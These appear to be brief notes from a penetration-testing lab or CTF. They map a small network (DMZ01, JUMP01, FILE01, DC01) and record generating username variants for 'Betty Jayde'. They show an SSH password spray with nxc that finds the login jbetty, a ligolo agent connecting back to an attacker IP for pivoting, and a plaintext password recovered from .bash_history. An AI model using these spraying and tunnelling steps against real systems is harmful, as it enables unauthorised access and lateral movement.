| Host | IP Address |
|---|---|
DMZ01 |
10.129.*.* (External), 172.16.119.13 (Internal) |
JUMP01 |
172.16.119.7 |
FILE01 |
172.16.119.10 |
DC01 |
172.16.119.11 |
DMZ01_EXT=10.129.234.116 # Variable
JUMP01=172.16.119.7
DMZ01=172.16.119.13
FILE01=172.16.119.10
DC01=172.16.119.11
PASS='Texas123!@#'
User:
Betty Jayde
Nexura LLC
Texas123!@#
Only SSH is opened.
username-anarchy Betty Jayde > possible_user.list
nxc ssh $DMZ01_EXT -u possible_user.list -p $PASS
[+] jbetty:Texas123!@# Linux - Shell access!
betty
bettyjayde
betty.jayde
bettyjay
bettjayd
bettyj
b.jayde
bjayde
jbetty
j.betty
jaydeb
jayde
jayde.b
jayde.betty
bj
Upload and run ligolo
./agent -connect 10.10.17.50:11601 -ignore-cert
In .bash_history:
sshpass -p "dealer-screwed-gym1" ssh hwilliam@file01